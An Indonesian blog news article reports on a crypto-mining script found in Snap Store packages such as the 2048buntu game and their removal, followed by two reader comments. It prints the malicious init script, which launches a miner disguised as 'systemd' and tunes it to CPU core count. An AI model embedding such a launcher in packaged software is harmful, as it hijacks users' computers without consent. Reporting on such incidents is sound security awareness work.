Berita

Malware Ditemukan pada Paket Snap, Paket Bersangkutan Telah Dihapus dari Snap Store

Sistem manajemen dan format paket binary seperti Snap mungkin adalah format yang dirindukan oleh sebagian pengguna GNU/Linux. Dengan format paket seperti itu, kita tidak perlu disibukkan mengatasi masalah dependensi hell yang mungkin terjadi jika kita memasang aplikasi menggunakan format konvensional seperti DEB (APT) dan RPM (DNF, Zypper).

Snap atau Snappy pertama kali dibangun oleh Canonical pada tahun 2014. Setelah diimplementasikan pada Ubuntu Core, Snap mulai diterapkan di Ubuntu desktop setahun dua tahun kemudian. Sekitar tahun 2016, kontributor snap pada proyek non-Ubuntu memorta daemon snap (snapd) ke distribusi CentOS, Fedora, Arch Linux, Gentoo, Debian, openSUSE, dan OpenWRT.

Snap Store

Namun, di balik kekerenan fitur yang ditawarkan oleh snap, ia juga membawa sesuatu yang riskan. Contoh kasusnya telah terjadi kemarin. Seorang kontributor Snap menemukan sisipan malware lebih tepatnya skrip penambang (miner) pada beberapa paket snap. Salah satu contoh paket yang dilaporkan adalah paket gim puzzle 2048 (2048buntu).

Lihat skrip init berisikan malware di bawah ini:

#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}

Setelah ditinjau oleh sang kontributor, paket tersebut dipelihara oleh Nicolas Tomb. Yang mengejutkan, ternyata tidak hanya paket 2048buntu yang dipelihara oleh Nicolas yang membawa malware. Untuk mengantisipasi hal-hal yang tidak diinginkan, semua paket snap Nicolas Tomb-pun telah dihapus dari Snap Store.

Pelajaran yang dapat dipetik

Kemudahan untuk meregistrasikan paket snap ke Snap Store oleh siapapun menjadi bumerang bagi pengembang. Mulai saat ini, pengelola Snap Store harus benar-benar meninjau semua paket yang diunggah di toko aplikasi tersebut. Jangan sampai terulang.

Tidak dapat dilacak berapa banyak pengguna Ubuntu yang telah memasang paket dari Nicolas. Oleh karena itu fitur anyar atau pembaruan untuk menghapus semua paket tersebut dari Nicolas tentu sangat bermanfaat.

Ramdziana adalah seorang narablog, pecinta kode, penggemar open source, pengguna GNU/Linux, dan penggemar Sherlock Holmes. Ikuti akun Twitter/Sebangsa @ramdziana
slot iklan

2 comments on “Malware Ditemukan pada Paket Snap, Paket Bersangkutan Telah Dihapus dari Snap Store

  1. Nif Kurniawan says:

    Insiden yang cukup disayangkan.
    Semoga segera ditemukan mekanisme untuk mencegah hal seperti ini terulang kembali.

    Tapi memang, installasi aplikasi adalah salah satu pintu rawan penyusupan malware.

  2. Mr. X says:

    Semoga flatpak tidak terjadi hal seperti ini.
    Untuk skrng cukup memakai cara tradisional, menggunakan APT dengan repo yg dipercaya.

Leave a Reply

Your email address will not be published. Required fields are marked *

Scroll to top